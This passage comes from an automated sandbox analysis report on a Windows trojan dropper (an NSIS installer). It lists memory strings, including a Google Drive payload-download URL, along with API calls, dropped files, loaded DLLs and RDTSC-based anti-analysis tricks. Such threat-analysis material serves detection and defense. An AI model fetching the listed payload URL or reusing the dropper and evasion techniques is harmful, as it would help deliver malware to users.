ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQiwmoPlvBzeBVuNawBnksVzfkJ3VpCM-c1RDd_Q6IH86o1z6aEttiVsaniFTQnz_bL9z9NQm4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:26 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zaLQfp8jLvZCrcUmhnUmOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: QNuQ5e175D.exe
      String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: QNuQ5e175D.exe, 00000003.00000003.1723334448.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1745810873.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1678008587.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadvv
      Source: QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadw
      Source: QNuQ5e175D.exe, 00000003.00000003.1993229355.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2082212148.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2060093323.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2015717613.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadx
      Source: QNuQ5e175D.exe, 00000003.00000003.2457226025.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloady
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: QNuQ5e175D.exe, 00000003.00000003.2434684472.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780080786.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1803358057.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757374960.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562113835.0000000003AC1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1779990575.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2027261178.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1592877929.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1970929884.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1960034459.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2445603809.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948458745.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, 
QNuQ5e175D.exe, 00000003.00000003.1604917776.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757332882.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: QNuQ5e175D.exe, 00000003.00000003.2434684472.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780080786.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628221931.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1803358057.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1667217683.0000000003A74000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757374960.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562113835.0000000003AC1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1779990575.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2027261178.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1592877929.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1970929884.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1960034459.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2445603809.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, 
QNuQ5e175D.exe, 00000003.00000003.1948458745.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: QNuQ5e175D.exe, 00000003.00000003.2434684472.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780080786.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1803358057.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757374960.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562113835.0000000003AC1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1779990575.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2027261178.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1592877929.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1970929884.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1960034459.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2445603809.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948458745.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, 
QNuQ5e175D.exe, 00000003.00000003.1604917776.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757332882.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe Code function: 0_2_0040573B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe Code function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe Code function: 3_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe File created: C:\Windows\Fonts\frostluften
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe File created: C:\Windows\Fonts\frostluften\Mangrate
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe Code function: 0_2_00406DE6
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe Code function: 0_2_004075BD
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe Code function: 0_2_73B01BFF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe Code function: 3_2_00406DE6
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe Code function: 3_2_004075BD
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe Code function: String function: 00402DCB appears 51 times
      Source: QNuQ5e175D.exe Static PE information: invalid certificate
      Source: QNuQ5e175D.exe, 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exe, 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exe Binary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.evad.winEXE@3/5@2/2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403552
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004049E7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049E7
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Users\user\AppData\Local\skattekodeJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Users\user\AppData\Local\Temp\nsd8F6D.tmpJump to behavior
      Source: QNuQ5e175D.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: QNuQ5e175D.exeVirustotal: Detection: 63%
      Source: QNuQ5e175D.exeReversingLabs: Detection: 44%
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile read: C:\Users\user\Desktop\QNuQ5e175D.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"Jump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: QNuQ5e175D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      Source: Yara matchFile source: 00000000.00000002.1535894824.000000000446C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2559418196.00000000017EC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_73B01BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73B01BFF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_73B030C0 push eax; ret 0_2_73B030EE
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI/Special instruction interceptor: Address: 4B06ED2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI/Special instruction interceptor: Address: 1E86ED2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeRDTSC instruction interceptor: First address: 4AD9B1D second address: 4AD9B1D instructions: 0x00000000 rdtsc 0x00000002 test bl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F74F0F9A0D8h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeRDTSC instruction interceptor: First address: 1E59B1D second address: 1E59B1D instructions: 0x00000000 rdtsc 0x00000002 test bl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F74F0F9B148h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe TID: 7992Thread sleep count: 42 > 30Jump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe TID: 7992Thread sleep time: -420000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_00402930 FindFirstFileW,3_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_004068D4 FindFirstFileW,FindClose,3_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C83
